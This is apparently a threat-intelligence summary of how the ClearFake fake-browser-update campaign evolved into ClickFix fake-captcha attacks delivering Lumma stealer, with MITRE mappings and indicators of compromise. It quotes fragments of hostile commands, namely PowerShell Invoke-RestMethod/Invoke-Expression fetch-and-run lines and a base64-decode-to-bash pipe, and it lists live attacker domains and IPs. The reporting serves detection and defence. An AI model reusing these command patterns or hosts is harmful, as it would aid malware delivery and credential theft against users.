In early 2024, attackers evolved from ClearFake’s fake browser update malware delivery to the more effective ClickFix fake captcha technique, leading to widespread credential theft. This evolution demonstrates sophisticated propagation, social engineering narratives, and technical evasion strategies, including abuse of trusted platforms like Google Scripts and cross-platform payloads. #ClearFake #ClickFix #LummaStealer
Keypoints
- ClearFake campaign used fake browser update pop-ups on compromised WordPress sites to deliver Lumma stealer malware.
- ClickFix replaced downloads with fake captcha pages that copied malicious PowerShell commands to victim clipboards, increasing stealth and infection success.
- Propagation evolved from malvertising to targeted delivery through compromised sites, social media, developer platforms, and SEO-driven bait sites.
- Social engineering narratives became more convincing, mimicking popular anti-bot systems, dynamically branding captchas to sites, and introducing urgency messaging.
- Technical evasion included command obfuscation, dynamic script loading, URL shortening, embedding malicious code in trusted libraries, and hosting payloads on Google Scripts domains.
- Payloads expanded to cross-platform support, targeting macOS and Linux with shell scripts exploiting user trust and unfamiliarity with command lines.
- Clustering analysis of clipboard payloads revealed distinct attacker profiles, infrastructure reuse, and operational toolkits, enabling larger-scale threat detection.
MITRE Techniques
- [T1059.001] PowerShell – Attackers used obfuscated PowerShell commands copied to the clipboard to execute malicious scripts remotely. (“powershell -NoProfile -WindowStyle Hidden -Command …Invoke-RestMethod…Invoke-Expression”)
- [T1071.001] Web Protocols – Malicious payloads were delivered via HTTP(S) requests to attacker-controlled domains hosting the second-stage dropper. (“Invoke-RestMethod -Uri $url”)
- [T1566.001] Phishing: Spearphishing Attachment – Attackers used fake browser update pop-ups and fake captcha pages deployed through malvertising and phishing emails impersonating legitimate services like Booking.com. (“Booking-branded login page…redirected to a Booking-themed fake captcha”)
- [T1140] Deobfuscate/Decode Files or Information – Attackers used multiple obfuscation techniques on PowerShell commands to evade signature-based defenses, including casing mutations, base64 encoding, and string concatenation. (“PoWerSheLL”, “echo … | base64 -d | bash”)
- [T1218] Signed Binary Proxy Execution – Abuse of legitimate platforms such as Google Scripts hosting malicious captchas to leverage trust and bypass security controls. (“hosting their fake captcha flows on google.com subdomains”)
- [T1107] File Deletion – Dynamic script loading from external servers reduced traces on compromised sites. (“pulling in obfuscated code from attacker-controlled servers at runtime”)
- [T1086] PowerShell – The use of PowerShell commands for remote code execution and payload retrieval was central to the attack chain. (“Invoke-Expression $response”)
Indicators of Compromise
- [Domains] Fake captcha and compromised sites delivering malicious payloads – example: 866059.eliteeyeview.co, candy-pdf-convertor.world, recaptchas.top, and many more.
- [Domains] Attacker-controlled payload hosting and command delivery – example: cmbkz8bui000008k22bcm3b3k3k.info, fepez.run, gfddx.run, recaptchas.top, and numerous others.
- [IP Addresses] Payload delivery and attacker infrastructure – example: 45.135.232.33, 138.199.156.22, 159.223.139.207, 193.36.38.237, among others.
- [File Names] Malicious script and payload files often dynamically loaded, e.g., socket.io.min.js injected with obfuscated code and attacker-controlled Google Scripts URLs.